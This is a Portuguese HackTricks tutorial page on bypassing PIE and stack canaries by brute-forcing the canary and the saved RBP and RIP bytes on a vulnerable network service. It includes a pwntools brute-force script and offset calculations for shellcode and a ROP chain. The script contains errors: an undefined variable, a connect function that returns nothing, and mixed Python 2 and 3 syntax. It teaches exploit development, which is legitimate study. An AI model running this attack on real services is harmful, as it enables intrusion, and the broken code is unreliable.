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# Endereços BF na Pilha
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{% hint style="success" %}
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Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
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Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
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<details>
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<summary>Suporte ao HackTricks</summary>
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* Verifique os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
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* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
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* **Compartilhe truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
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</details>
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{% endhint %}
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**Se você estiver lidando com um binário protegido por um canário e PIE (Executable Independente de Posição), provavelmente precisará encontrar uma maneira de contorná-los.**
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![](<../../../.gitbook/assets/image (865).png>)
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{% hint style="info" %}
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Observe que o **`checksec`** pode não detectar que um binário está protegido por um canário se ele foi compilado estaticamente e não é capaz de identificar a função.\
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No entanto, você pode perceber manualmente isso se encontrar que um valor é salvo na pilha no início de uma chamada de função e esse valor é verificado antes de sair.
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{% endhint %}
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## Endereços de Força Bruta
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Para **contornar o PIE**, você precisa **vazar algum endereço**. E se o binário não estiver vazando nenhum endereço, a melhor coisa a fazer é **forçar bruta o RBP e RIP salvos na pilha** na função vulnerável.\
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Por exemplo, se um binário é protegido usando tanto um **canário** quanto **PIE**, você pode começar a forçar bruta o canário, então os **próximos** 8 Bytes (x64) serão o **RBP** salvo e os **próximos** 8 Bytes serão o **RIP** salvo.
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{% hint style="success" %}
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Supõe-se que o endereço de retorno dentro da pilha pertence ao código binário principal, que, se a vulnerabilidade estiver localizada no código binário, geralmente será o caso.
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{% endhint %}
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Para forçar bruta o RBP e o RIP do binário, você pode descobrir que um byte adivinhado válido está correto se o programa produzir algo ou simplesmente não travar. A **mesma função** fornecida para forçar bruta o canário pode ser usada para forçar bruta o RBP e o RIP:
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```python
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from pwn import *
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def connect():
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r = remote("localhost", 8788)
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def get_bf(base):
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canary = ""
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guess = 0x0
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base += canary
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while len(canary) < 8:
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while guess != 0xff:
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r = connect()
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r.recvuntil("Username: ")
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r.send(base + chr(guess))
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if "SOME OUTPUT" in r.clean():
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print "Guessed correct byte:", format(guess, '02x')
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canary += chr(guess)
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base += chr(guess)
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guess = 0x0
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r.close()
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break
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else:
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guess += 1
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r.close()
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print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
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return base
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# CANARY BF HERE
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canary_offset = 1176
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base = "A" * canary_offset
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print("Brute-Forcing canary")
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base_canary = get_bf(base) #Get yunk data + canary
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CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary
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# PIE BF FROM HERE
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print("Brute-Forcing RBP")
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base_canary_rbp = get_bf(base_canary)
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RBP = u64(base_canary_rbp[len(base_canary_rbp)-8:])
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print("Brute-Forcing RIP")
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base_canary_rbp_rip = get_bf(base_canary_rbp)
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RIP = u64(base_canary_rbp_rip[len(base_canary_rbp_rip)-8:])
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```
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A última coisa que você precisa para derrotar o PIE é calcular **endereços úteis a partir dos endereços vazados**: o **RBP** e o **RIP**.
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A partir do **RBP**, você pode calcular **onde está escrevendo seu shell no stack**. Isso pode ser muito útil para saber onde você vai escrever a string _"/bin/sh\x00"_ dentro do stack. Para calcular a distância entre o RBP vazado e seu shellcode, você pode simplesmente colocar um **ponto de interrupção após vazar o RBP** e verificar **onde está localizado seu shellcode**, então, você pode calcular a distância entre o shellcode e o RBP:
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```python
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INI_SHELLCODE = RBP - 1152
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```
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A partir do **RIP** é possível calcular o **endereço base do executável PIE**, o que será necessário para criar uma **cadeia ROP válida**.\
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Para calcular o endereço base, basta executar `objdump -d vunbinary` e verificar os últimos endereços desmontados:
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![](<../../../.gitbook/assets/image (479).png>)
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Neste exemplo, é possível ver que apenas **1 byte e meio é necessário** para localizar todo o código, então, o endereço base nesta situação será o **RIP vazado, mas terminando em "000"**. Por exemplo, se o vazamento for `0x562002970ecf`, o endereço base será `0x562002970000`.
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```python
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elf.address = RIP - (RIP & 0xfff)
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```
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## Melhorias
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De acordo com [**algumas observações deste post**](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#extended-brute-force-leaking), é possível que ao vazar os valores RBP e RIP, o servidor não irá travar com alguns valores que não são os corretos e o script BF pensará que obteve os corretos. Isso ocorre porque é possível que **alguns endereços simplesmente não causem a quebra, mesmo que não sejam exatamente os corretos**.
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De acordo com esse post do blog, é recomendado adicionar um pequeno atraso entre as solicitações feitas ao servidor.
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{% hint style="success" %}
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Aprenda e pratique Hacking na AWS: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Treinamento AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
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Aprenda e pratique Hacking no GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Treinamento GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
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<summary>Apoie o HackTricks</summary>
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{% endhint %}
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